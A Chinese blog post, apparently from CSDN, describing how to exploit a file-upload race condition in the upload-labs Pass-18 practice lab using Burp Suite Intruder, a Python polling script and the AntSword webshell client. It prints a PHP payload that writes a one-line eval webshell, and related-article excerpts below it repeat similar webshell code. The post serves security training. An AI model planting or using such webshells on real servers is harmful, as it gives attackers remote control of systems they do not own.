Burpsuite配合蚁剑利用条件竞争

最新推荐文章于 2024-04-15 02:02:09 发布
最新推荐文章于 2024-04-15 02:02:09 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: 信息安全 文章标签: 条件竞争 pass-18
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35350265/article/details/113337635
版权

目录

破解思路

绕过过程

打开pyhon脚本

打开Burpsuite

上传文件成功并连接

结合upload-labs-Pass18

破解思路

存在条件竞争漏洞,大概意思就是如果能在上传的一句话木马被删除之前访问成功了,那么就可以拿shell了

绕过过程

  1. 不断上传文件,在文件还没被删除前去读取文件,
  2. 若上传内容为<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST["pass"])?>');?>
  3. 则还没被删除前去读取文件,解析之后会写入一个内容为<?php @eval($_POST["pass"])?>2.php文件。
  4. 使用BurpSuite的Intruder不断上传文件并不断访问所上传的文件。
  5. 注:"pass"一定要双引号,不然单引号之间乱了。
muma.php
<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST[pass]);?>'); ?>

打开pyhon脚本

利用pyhon脚本持续访问目标文件

打开Burpsuite

利用Burpsuite持续上传文件

上传文件成功并连接

python脚本连接成功,说明文件上传成功,这时使用蚁剑连接。即可控制靶机

多喝热水 
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
小结一下Web的条件竞争的题目
0verWatch的博客
03-10 5618
前言 最近在做我们学校平台的一个题目的时候,突然发现了一个新知识。。。。。可能我是菜鸡吧,大佬们请忽视 正文 这个知识点叫条件竞争。。。 条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。 简单点理解就是在你要做一件事情的时候用很快的速度插了个队并做了另外一件事,一旦这件事...
高并发下的漏洞条件竞争
zmzsg100的专栏
06-12 448
隔离性有4种,包括读未提交(Read uncommitted)、读提交(read committed)、可重复读(repeatable read)和串行化(Serializable)。2、数据库查询该码,如果查到库里有这个码并且码未被消费过,则走到第3步的逻辑里,否则返回code not useful。4、更新用户的余额,比如兑换的充值码为20元,用户money字段增加20。余额只有80,和预期的不太一样,但有一点是肯定的,一个码被兑换了多次。3、更新码的状态,更新消费该码的用户,
中国+burpsuite+webshell文件上传(超完整)
qq_50953689的博客
05-14 2680
之前:需要打开phpstudy的靶场环境 第一步 ➊准备木马文件 新建木马文件ttx.php,文件内容为 <?php @eval($_REQUEST["shell"]); ?> ➋保存后,将文件后缀名php改为jpg ➌登录dvwa测试环境,将security等级改为‘low’(其它模式,后端也做了校验,无法完成第⑤步的操作),然后打开文件上传模块 ➍上传文件,选择第②步保存的shell.jpg,在点击‘Upload’之前,打开burpsuite拦截功能并且点击‘Upl
条件竞争实验-多线程竞争访问
iczfy585的博客
08-07 495
条件竞争的原理是没有对临界资源(共享变量)实现互斥访问,这就可能导致多线程访问时出现结果的不可再现性。解决方法可以是加锁,对临界区的操作要有原子性。 实验环境: wamp,burpsuit 案例 一个文件上传操作,主要源码如下: <?php header("content-type:text/html;charset=utf-8"); if($_FILES["myfile"]["error"] > 0){ echo "upload error"; }else{ $filenam.
【后端检测-绕过】条件竞争漏洞(多线程共享)
07-03 603
【后端检测绕过-条件竞争
条件竞争漏洞
qq_45521281的博客
06-22 910
竞争条件”是什么? 竞争条件发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。 开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,但他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果。 线程同步机制确保两个及以上的并发进程或线程不同时执行某些特定的程序段,也被称之为临界区(critical section),如果没有应用好同步技术则会发生“竞争条件”问题。 条件竞争漏洞其实也就是当同时并发多个线程去做同一件事,导致处理逻辑的代码出错,出现意想不到
burpsuite小白教程。手把手教学 使用burpsuite拦截浏览器请求,修改请求参数,查看返回结果
06-09
总的来说,Burpsuite是Web安全领域的一款强大工具,通过学习这个教程,你可以掌握如何利用它进行基本的网络请求拦截、修改和分析,从而提升你的安全测试技能。记住,实践是掌握任何工具的关键,所以不要害怕尝试和...
burpsuite安装教程
04-08
burpsuite安装教程 首先,从官网下载您需要的Burp Suite版本。 安装Java Development Kit(JDK)。Burp Suite是用Java编写的,因此需要预先安装Java环境才能运行。如果您已经安装了JDK,则可以跳过此步骤。 解压缩...
BurpSuite手册-016-Burp Suite tools-inspector
07-01
本人自己翻译的Burp Suite 专业版的中文手册,陆续更新,请期待
BurpSuite使用介绍(一)
02-21
BurpSuite是用于攻击web应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP消息,持久性,认证,代理,日志,警报的一个强大...
BurpSuite2.1.06.zip
12-22
Burp Suite是一个集成化的渗透测试工具,它集合了多种渗透测试组件,使我们自动化地或手工地能更好的完成对web...想学习更多BurpSuite,可以参见:https://t0data.gitbooks.io/burpsuite/content/ BurpSuite实战指南
BurpSuite抓不到本地包_bp抓不到包,2024年最新网络安全开发者该学习哪些东西提高竞争
最新发布
2301_79054215的博客
04-15 1000
昨天我去打sqli靶场第八关的时候,想用一下BurpSuite(以下简称bp)抓包,然后突然发现,我的BurpSuite抓不到本地包了(127.0.0.1)。。明明之前我打pikachu靶场时,还用过bp抓包进行过暴力破解的。属实是有点措不及防了,有点懵。先说一下产生这个问题的环境,我用的是win10系统,火狐浏览器,开了bp代理。我找到了几种解决方法,请看下文。默认配置好了证书,这里不介绍如何配置证书。
Upload-labs 17 条件竞争
W小哥
01-13 1802
查看源码 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['t...
渗透之文件包含漏洞
Jian Sun_的博客
05-16 1371
文件包含漏洞介绍 文件包含故名思意就是文件中包含其他的文件,这也许是开发人员为了减轻开发量从而在代码设计的时候包含了某些文件,更甚者是直接包含了类似*.php、*.*这种文件。首先文件包含这个行为是正常的,因为在开发的途中难免会遇到有重复的代码等需要设计,而通过文件包含就可以减轻一定的工作量,所以文件包含本身是正常的。但是需要注意在文件包含行为中的一些配置,如果是PHP的话,那么在PHP安装目录下的php.ini配置文件中可以对文件包含的一些配置进行相关的设置: php.ini的一些配置信息查看 文件包
burpsuite插件生成文件包含session的poc
Firebasky的博客
07-26 531
Session-upload 该项目是burpsuite的插件,目的是在遇到Session上传的条件竞争中快速生成poc。 插件地址
一些相见恨晚的BurpSuite插件推荐
weixin_50464560的博客
08-15 2185
原地址:https://www.secpulse.com/archives/124527.html BurpSuite 是我心中最强大的Web渗透工具,没有之一!它也是日常中用得最多的工具,它有一些强大的插件可以帮忙我们减少大量的工作量以及更好地挖掘漏洞,今天分享下我常用的一些 burp 插件。 Autorize —— 强大的越权自动化测试工具 如果你在测试越权的时候,还是手动把URL复制到另一个浏览器的低权限账号中来打开,你就out了! Autorize 是一个测试权限问题的插件,可以在
基于实战的Burp Suite插件使用Tips
网安君的博客
01-17 4921
基于实战的Burp Suite插件使用技巧 本篇文章首发于奇安信攻防社区 0×00前言 ​ Burp Suite是一个集成化的渗透测试工具,它集合了多种渗透测试组件,使我们自动化地或手工地能更好的完成对web应用的渗透测试和攻击。在渗透测试中,我们使用Burp Suite将使得测试工作变得更加容易和方便,即使在不需要娴熟的技巧的情况下,只有我们熟悉Burp Suite的使用,也使得渗透测试工作变得轻松和高效。 Burp Suite可执行程序是java文件类型的jar文件,免费版的可以从免费版下载地址
BurpSuite插件
mingyqf的博客
02-12 8883
Burp Extensions BurpSuite 相关收集项目,插件主要是非BApp Store(商店) 插件的安装 JAVA编写的插件: Python编写的插件: Python编写的插件,需要使用Jython。Jython本质上是一个Java应用程序,Jython允许编码人员使用Java编码调用Python库。也可以使用Python调用Java的库。 Jython下载地址: https://www.jython.org/download 下载好之后,添加到Burp。 导入Python编写的插件,导
渗透之文件上传漏洞
Jian Sun_的博客
05-16 880
文件上传漏洞原理 所谓文件上传漏洞,就是利用上传相应的可执行脚本文件到服务器上,使我们能够获得服务器的操作权限。可执行的脚本文件有很多,这里就拿PHP的一句话木马举例: <?php @eval($_POST[value]);?> 这里面的 value 可以换成其他任意的,这个表示连接被植入可执行代码服务器的密码。我们在把它保存为一个php文件后,就可以想办法上传到服务器上面。上传上去后我们就可以通过“中国菜刀”连接上目标服务器,对它进行操作管理。 进入OWASPBWA中的DVWA漏洞
代理搭配burpsuite
09-07
代理可以与Burp Suite搭配使用。是一款开源的跨平台网站管理工具,而Burp Suite是用于攻击web应用程序的集成平台。通过将代理设置为Burp Suite的代理,可以将所有的HTTP流量导入到Burp Suite进行分析和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值